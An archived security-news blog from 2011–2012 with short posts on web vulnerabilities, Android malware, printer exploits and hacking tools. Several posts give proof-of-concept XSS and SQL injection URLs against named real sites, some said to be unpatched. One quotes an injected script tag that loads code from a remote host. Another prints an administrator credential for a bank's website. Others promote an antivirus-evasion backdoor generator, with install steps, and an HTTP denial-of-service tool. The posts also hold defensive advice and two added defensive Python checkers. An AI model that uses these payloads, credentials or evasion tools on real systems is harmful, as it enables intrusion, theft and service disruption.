Showing posts with label Vulnerability. Show all posts

Sunday, 29 January 2012

SQLi Vulnerability found in New York State Senate Official Site



A few days ago the Sec Indi Security Team exposed a cross-site request forgery (CSRF) vulnerability in the WikiLeaks website. They have now found SQL injection on the official website of the New York State Senate. Earlier, this group also detected a SQL injection vulnerability on the official website of the US Senate, and they hacked the admin panel of the well-known Indian website Click India. The vulnerability on the NY State Senate site is still unpatched. According to the group, an attacker can easily misuse this security flaw to gain illegal access to the database of the NY State Senate.
Proof Of Concept :-
http://www.nysenate.gov/committee/administrative_regulations_review_commission_%28arrc%29/updates/feed?type=%27legislation

Saturday, 28 January 2012

XSS Vulnerability in Bloggers.com













The hacker group "GodOfHackers" discovered an XSS (cross-site scripting) security flaw in the high-profile site bloggers.com. Bloggers.com is a bloggers' community that helps you find the best bloggers around the world, discover them and connect with this friendly community. It has an Alexa rank of 3,519.

Vulnerability Details:

    Type: Non-Persistent XSS
    Alert-Level: Medium
    Author: GodOfHackers
    Vulnerable Link: http://bloggers.com/topics/


Proof of Concept :-

http://bloggers.com/topics/%3Cscript%3Ealert%28%22XSS+By+GOH%22%29%3C%2Fscript%3E

XSS Vulnerability found in Photobucket






An XSS (cross-site scripting) vulnerability was found in photobucket.com by God Of Hackers. The hacker group n0caReTeAm also found an XSS vulnerability in photobucket.com. The two vulnerabilities appear to be the same.

Here is the vulnerable link found by GodofHackers:
http://media.photobucket.com/image/hacker/ahsanulkarim/Tech%20Zons/wordpress-hacked-290x160.jpg?o=%22%3E%3Cscript%3Ealert%28%22XSS%20By%20GOH%22%29%3C/script%3E

Tuesday, 24 January 2012

Tor Vulnerable to Remote arbitrary code Execution




According to the latest Gentoo Linux Security Advisory, multiple vulnerabilities have been found in Tor, the most severe of which may allow a remote attacker to execute arbitrary code. Tor is an implementation of second-generation Onion Routing, a connection-oriented anonymizing communication service.

Using these vulnerabilities, a remote attacker could possibly execute arbitrary code or cause a Denial of Service. Furthermore, a remote relay the user is directly connected to may be able to disclose anonymous information about that user or enumerate bridges in the user's connection.

The advisory explains that the affected packages are versions < 0.2.2.35. The vulnerabilities discovered in Tor are listed below:

* When configured as client or bridge, Tor uses the same TLS certificate chain for all outgoing connections (CVE-2011-2768).
* When configured as a bridge, Tor relays can distinguish incoming bridge connections from client connections (CVE-2011-2769).
* An error in or/buffers.c could result in a heap-based buffer overflow (CVE-2011-2778).

All Tor users should upgrade to the latest version.

Monday, 23 January 2012

Phishing Google Users with the Help of Google !




How are hackers phishing Gmail/Google users successfully? Christy Philip Mathew, an Information Security Instructor from India, shared a trick with us. He simply exploits human psychology. Let's see how:

He created a phishing page of Google and uploaded it to: http://www.keepbacktrack.net84.net/ . Now, how to make this URL look legitimate to victims? Simple: using the Google translation tool.

Google translation has a weakness: if an attacker translates a fake Gmail login page, he gets a perfectly crafted link that can be used for malicious purposes or phishing. The image shown above is an example of this trick. The new phishing URL is here, after using the translation tool. This is the art of psychological manipulation, using Google to hack Google users.

Monday, 16 January 2012

Angry Birds[FAKE] Game spreading Malware from Android Market



Last week, premium-rate SMS Trojans surfaced in the Android Market. Google has pulled 22 apps that were masquerading as legitimate versions of popular games like Angry Birds and Cut the Rope. Security researchers have discovered a way to bypass an Android smartphone owner's permissions and access private data stored on their smartphone.

The Avast blog explains it this way: for example, if someone tried to look for “Cut the rope free”, this malicious application was in fourth place in the search results. Apps published by the developer Miriada Production may look like well-known Android games (Angry Birds, Need for Speed, World of Goo and others), and users could easily be confused.

The fake apps include "Cut the Rope", "Need for Speed", "Assassins Creed", "Where's My Water? ","Riptide GP", "Great Little War Game", "World of Goo", "Angry Birds", "Shoot The Birds", "Talking Tom Cat 2", "Bag It!" and "Talking Larry the Bird". The apps have been pulled from the Android Market.

The fraudulent apps would install a premium rate SMS Trojan that would rack up hidden charges on the user's phone bill. The apps would lure customers into clicking on options that would send text messages to premium line numbers leaving the user to foot the bill. According to Lookout Mobile Security, the new threat called RuFraud has been found in an initial batch of apps on the Android Market that include horoscope apps, wallpapers, and game apps that pretend to be legitimate games like Angry Birds.

What happens if these threats are installed on your mobile device?
  • It attempts to send text messages containing the string “798657” to premium-rate numbers using the infected device’s current default SMS Center (SMSC) by exploiting the Permissions function (android.permission.SEND_SMS).
  • It is capable of sending an affected user’s GPS location via HTTP POST.
  • It opens several ports and connects to specific URLs to receive and execute commands from a remote user.
  • It gathers information like International Mobile Equipment Identity (IMEI) and International Mobile Subscriber Identity (IMSI) numbers from infected systems, which is then sent to a specific site.
  • It secretly forwards all incoming text messages to a remote user.

How do users get these threats?
Trend Micro has reported several incidents wherein malware came disguised as Android apps. Samples of Android malware found in the wild include:
  • ANDROIDOS_DROIDSMS.A: Came disguised as Windows Media Player.
  • ANDROIDOS_DROISNAKE.A: Came in the form of a game known as Tap Snake.
  • ANDROIDOS_GEINIMI.A: Came in the form of Trojanized apps hosted in certain third-party app stores in China.
  • ANDROIDOS_ADRD.A: Comes in the form of a Trojanized wallpaper app.
  • ANDROIDOS_LOTOOR.A: Trend Micro’s detection for Trojanized versions of legitimate apps like “Falling Down”.
  • ANDROIDOS_BGSERV.A: Trojanized version of Android Market Security Tool, which was released to address the modifications done by AndroidOS_LOTOOR.A.
Trend Micro suggests: "Users can also check the developer’s profile for other apps. Google also offers developer ratings, as well as the status 'Editor’s Choice' that can further validate the developer’s legitimacy. It is also a good practice to check app ratings and user feedback for more verification. The user rating and feedback feature give people a more accurate view of the experiences users have when using or installing the app. You can find it just below the app icon."

Sunday, 15 January 2012

URL redirection Vulnerability in Google & Facebook




An open redirect is a vulnerability that exists when a script allows redirection to an external site by directly calling a specific URL in an unfiltered, unmanaged fashion, which could be used to redirect victims to unintended, malicious web sites. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.

A similar vulnerability has been reported in Google by "Ucha Gobejishvili ( longrifle0x )". This problem may help an attacker conduct phishing attacks, trojan distribution and spam.
Url: https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.something.com

Same vulnerability in Facebook, Discovered by ZeRtOx from Devitel group:
http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.something.com


Impact of Vulnerability  :
  • The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.
  • The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.

Tuesday, 10 January 2012

XSS vulnerability reported in Yahoo subdomain website




Vansh Sharma & Vaibhuv Sharma from India reported another important cross-site scripting (XSS) vulnerability in a Yahoo subdomain, as shown.

Vulnerable Link : http://au.tv.yahoo.com/plus7/royal-pains/
Proof of Concept : Search <img src="<img src=search"/onerror=alert("XSS")//"> in box.


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

Saturday, 7 January 2012

Ping.fm vulnerable to Clickjacking



Two Indian hackers, Aditya Gupta (@adi1391) and Subho Halder (@sunnyrockzzs), have discovered a clickjacking vulnerability in the well-known website "Ping.FM". Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

This is based on a technique known as clickjacking (or UI redressing), where an attacker could perform actions on behalf of the user by tricking the user into clicking a button or performing some other action.

This vulnerability was earlier seen in Twitter, where the status could be loaded through the GET method, and an attacker could frame the Twitter webpage and trick the user into clicking the tweet button, with the user thinking that it's a part of the attacker's webpage.

This can be prevented by setting the X-Frame-Options header to SAMEORIGIN, or to DENY to forbid use of the webpage inside a frame, which has been adopted by Google, Facebook and many other well-known websites.

Ping.fm is an online service which allows the user to connect to many social networks at once. However, an attacker could use clickjacking to silently update the user's social networking status at Twitter, Facebook and all other connected accounts. In this technique, the user is tricked into clicking a button on a webpage designed by the attacker, which silently updates the user's status on the social networks by taking advantage of the Ping.fm API and the clickjacking technique.
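To check whether a site's pages actually carry the anti-framing header mentioned above, a defender can classify the response headers of each page. This is an added example, not code from the original post or from Ping.fm; it also goes beyond the post by honouring the Content-Security-Policy `frame-ancestors` directive, and the page paths and header values in the sample are constructed.

```python
def framing_protection(headers):
    """Classify anti-framing headers as 'deny', 'sameorigin', 'allowlist' or 'none'."""
    norm = {name.lower(): value for name, value in headers.items()}

    # Browsers that support CSP frame-ancestors apply it instead of X-Frame-Options.
    for directive in norm.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [t.lower() for t in tokens[1:]]
            if not sources or sources == ["'none'"]:
                return "deny"
            if sources == ["'self'"]:
                return "sameorigin"
            if any(s in ("*", "http:", "https:") for s in sources):
                return "none"  # any origin may frame the page
            return "allowlist"

    # Only the exact tokens DENY and SAMEORIGIN count; a misspelled value
    # such as "SAME ORIGIN" is ignored by browsers and gives no protection.
    xfo = norm.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "sameorigin"
    return "none"


def unprotected_pages(responses):
    """Return the paths whose response headers leave the page frameable by anyone."""
    return sorted(path for path, hdrs in responses.items()
                  if framing_protection(hdrs) == "none")


# Constructed sample: path -> response headers, as a crawler might record them.
SAMPLE_RESPONSES = {
    "/login": {"X-Frame-Options": "DENY"},
    "/status/update": {"Content-Type": "text/html"},
    "/settings": {"x-frame-options": "SAME ORIGIN"},
    "/widget": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
}

if __name__ == "__main__":
    print(unprotected_pages(SAMPLE_RESPONSES))
```
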


Wednesday, 4 January 2012

XSS Vulnerability found in fortiguard.com


Hacker "ring0" discovered and exploited an XSS vulnerability in fortiguard.com. Recently, he exploited the persistent XSS vulnerability in VirusChief.com. He used the same method for this site as well. It seems that he targets security-related sites.

Vulnerable Link:
http://www.fortiguard.com/antivirus/virus_scanner.html

Tuesday, 3 January 2012

Persistent XSS Vulnerability found in VirusChief.com


A hacker named "ring0" discovered and exploited the persistent XSS vulnerability in VirusChief.com. Whenever someone visits the page, it pops up with your cookie information. Hopefully, it is not stealing any cookies from you for now. Anyway, be careful while visiting the link (clear your cookies).

Infected Link:
http://www.viruschief.com/report.html?report_id=8004c2e835edbc097fdbe84282643813295a21e3

The hacker uploaded a file renamed as
<BODY ONLOAD=alert(document.cookie)>

This HTML with JavaScript produces the popup message with the cookie. When the file is uploaded to the page, it replaces the original <body> tag with the above tag.

Monday, 2 January 2012

Over One million Pages infected by lilupophilupop.com SQL injection :XSS Injection


Last year (yes, it is last year) on Dec 1st, ISC reported on the lilupophilupop.com SQL injection attack (combined with an XSS technique). When they first reported it, the number of infected pages was 80. Later, in the middle of the month, it rose to 160,000. At the end of the month (now), the infected page list has crossed one million.

These sites are infected by injecting the following script:
"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domains are from:

  • NL - 123,000
  • FR - 68,100
  • UK - 56,300
  • DE - 49,700
  • RU - 32,000
  • DK - 31,000
  • COM - 30,500
  • JP - 23,200
  • CA - 16,600
  • ORG - 2,690
  • CN - 505

Log records of the infected sites show that the attackers try to attack the vulnerable sites daily from different IP addresses.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept," said the first report.


Check Whether Your Site Is Infected by This Attack:
If you want to find out whether your site is infected by the attack, search Google for:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

Replace "your_site.com" with your site's URL.
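Both checks described in this post, looking for HTTP 500 responses in the web logs and looking for the injected script tag in stored content, can be run locally rather than through a search engine. The following is an added example, not code from ISC or the original post; the log lines, database field values, file names and the `www.example.com` host are constructed, and the log format is assumed to be the common/combined access-log layout.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed access-log layout: client ident user [time] "METHOD URL PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})\b')


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, tolerating broken markup."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def foreign_script_hosts(html, own_hosts):
    """Return hosts of <script src=...> tags in html that are not in own_hosts."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hosts = set()
    for src in collector.sources:
        host = (urlsplit(src).hostname or "").lower()
        if host and host not in own_hosts:
            hosts.add(host)
    return hosts


def failing_requests(log_lines):
    """Map each parameterised path that returned HTTP 500 to the clients that hit it."""
    hits = {}
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, url, status = match.groups()
        path, _, query = url.partition("?")
        if status == "500" and query:
            hits.setdefault(path, set()).add(client)
    return hits


OWN_HOSTS = {"www.example.com"}  # assumption: the site being checked

# Constructed database field values; the first carries the script string quoted in the post.
SAMPLE_ROWS = [
    'Blue widget"></title><script src="http://lilupophilupop.com/sl.php"></script>',
    '<p>Blue widget</p><script src="/js/cart.js"></script>'
    '<script src="https://www.example.com/js/a.js"></script>',
]

# Constructed log lines using documentation IP ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2011:10:00:01 +0000] "GET /product.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Dec/2011:10:00:02 +0000] "GET /product.asp?id=12%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [02/Dec/2011:09:12:44 +0000] "GET /product.asp?id=12%27 HTTP/1.1" 500 312',
    '192.0.2.9 - - [02/Dec/2011:09:13:00 +0000] "GET /about.asp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        print(sorted(foreign_script_hosts(row, OWN_HOSTS)))
    print(failing_requests(SAMPLE_LOG))
```
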

Saturday, 31 December 2011

Print of one malicious document can expose your whole LAN





This year at the Chaos Communication Congress (28C3), Ang Cui presented Print Me If You Dare, in which he explained how he reverse-engineered the firmware-update process for HP's hundreds of millions of printers, and in Andrei Costin’s presentation “Hacking MFPs” he covered the history of printer and copier hacks from the 1960s to today.



Cui discovered that he could load arbitrary software into any printer by embedding it in a malicious document or by connecting to the printer online. As part of his presentation, he performed two demonstrations: in the first, he sent a document to a printer that contained a malicious version of the OS that caused it to copy the documents it printed and post them to an IP address on the Internet; in the second, he took over a remote printer with a malicious document, caused that printer to scan the LAN for vulnerable PCs, compromise a PC, and turn it into a proxy that gave him access through the firewall.

Costin found a method to exploit the firmware update capability of certain Xerox MFPs to upload his crafted PostScript code. He was able to run code to dump memory from the printer. This could allow an attacker to grab passwords for the administration interface or access or print PIN-protected documents.
MFPs are trusted devices connected to the office network, but sometimes they’re also accessible from the Internet. The numbers of publicly accessible office MFPs range in the tens of thousands. An attacker could craft PostScript code tied with exploits from the Metasploit framework and upload it to an MFP to attack a corporate network.

Cui’s technique for infecting printers involves the more limited Printer Job Language, rather than PostScript, and injects code into processes running on the printer. This was effectively a custom rootkit for the printer’s OS. Cui gave HP a month to issue patches for the vulnerabilities he discovered, and HP now has new firmware available that fixes this (his initial disclosure was misreported in the press as making printers vulnerable to being overheated and turning into "flaming death bombs"; he showed a lightly singed sheet of paper that represented the closest he could come to this claim). He urges anyone with an HP printer to apply the latest patch, because malware could be crafted to take over your printer and then falsely report that it has accepted the patch while discarding it.


The vulnerability was disclosed to HP, and updates for infected printers were released last week.

Friday, 16 December 2011

Linkedin,IndiaStudyChannel vulnerable to Persistent XSS(Cross site Scripting)

A hacker found XSS vulnerabilities in LinkedIn, IndiaStudyChannel and two other websites. Unfortunately, it is persistent XSS. An attacker can use this vulnerability to launch malicious attacks on users.


http://events.linkedin.com/scriptalerthiscript-37029
http://www.indiastudychannel.com/member/qwerty123.aspx
http://www.i-neighbours.org/index.php?zipcode=19046&hoodId=awsome
http://old.nabble.com/adding-%24%28%22%3Cscript%3E%22%29-node-actually-runs-the-script---correct-behavior--td23608124s27240.html

He reported the vulnerability to those websites.

Thursday, 15 December 2011

SMS Attack Vulnerability In Windows Phone 7.5



Khaled Salameh discovered a serious vulnerability in Windows Phone 7.5 "Mango". He reported this vulnerability to WinRumors & Microsoft. If and when a security patch will be released from Microsoft's end to fix the issue is still unclear.
In an exclusive report it has been said that the Messaging Hub on Windows Phone 7.5 "Mango" devices can be completely disabled using a specially crafted SMS message. When a Windows Phone device receives the message, it causes the device to reboot and prevents the Messaging Hub from loading despite repeat attempts to open it. This Denial-of-Service (DoS) attack can also be exploited by sending a message from Facebook chat or Windows Live Messenger to the phone.




Tom Warren of WinRumors says that the only way to fix a device affected by the problem is to perform a hard reset and wipe the device, during which all personal data will be lost. They have also tested the attack on several phones such as the HTC TITAN and the Samsung Focus Flash. These included devices running the 7740 build (7.10.7740.16) of Windows Phone 7.5 and Mango RTM build 7720 (7.10.7720.68).

Facebook Ticker partially Removed Due To Various Bugs




According to a post on Facebook's Known Issues page, the removal of the ticker has apparently motivated the social network to call the phenomenon a bug that’s undergoing a fix.

Facebook says that "Some people are seeing their ticker disappear. We are aware of this issue and are working to resolve it." Comments explain that people with less active accounts won’t see the feature, because when your friends aren’t doing anything on the site, the ticker would only duplicate the news feed and not scroll, so there’s no point in the feature taking up part of your screen.

Not only this: last month a Brazilian (independent) security and behavior research effort analyzed a privacy issue in Facebook Ticker that allows any person to track you without your knowledge or consent, and how Facebook Ticker exposes your information and behavior without your knowledge. Meanwhile, the Known Issues on Facebook page posted that some people who should be seeing the ticker aren’t, and that the site is working to fix this glitch while developers continue to refine the ticker, alternately testing labels for the feature along with shifting its location and size.

Script To Bypass Antivirus & Firewall By Security Labs


Security Labs experts from India have launched an automated anti-virus and firewall bypass script. It is a modified and stable version made to work with the Backtrack 5 distro. To compile the generated payload, Mingw32 gcc must be installed on your system.

Method:-
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

After the installation you need to move the shell script (Vanish.sh) to the default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14.
Note: By default the script generates a Reverse TCP payload, but you can change it with some modifications to the script [vanish.sh]. The virus scan report of the backdoor shows that it is almost undetectable by most antivirus programs.

Security Labs experts also released a pastebin. The rest of the information can be found in that release.


Wednesday, 14 December 2011

Assassin DoS Ver 2.0.3, A Powerful HTTP DOS Tool


The latest version of Assassin DoS, 2.0.3, is developed by MaxPainCode. The new Assassin DoS tool is based on a new attack that uses HTTP Flood to take a site down; this will work if you try with a big dedicated server. Another feature of Assassin DoS is that it will not take all your resources as most DoS tools do. Also, there is only about a 100-millisecond delay when hitting the target, and it is available for Windows.

Tuesday, 13 December 2011

XSS vulnerability found in RankMyHack.com

A hacker named "lolstorm" found an XSS vulnerability in Rankmyhack.com. The contact form of the website is vulnerable to XSS (cross-site scripting). RankMyHack is a site that ranks hackers based on their hacks.

Vulnerable Link:
www.rankmyhack.com/contact.php

POC:
www.rankmyhack.com/contact.php?subject=XSS onmouseover=alert(this.value);

This displays an alert box with "XSS".

Eastern Bank of Bangladesh Is Vulnerable to SQL Injection



The website of Eastern Bank Ltd., Bangladesh, is vulnerable to SQL injection. This vulnerability was found by Sen haxor; Sen is a member of Indian Cyber Force.


The hack exposed the username and password of the website through SQL injection:
username : administrator
password : X23@tH%4Sd (its a Hash You need to crash it For login in website)


website : www.ebl.com.bd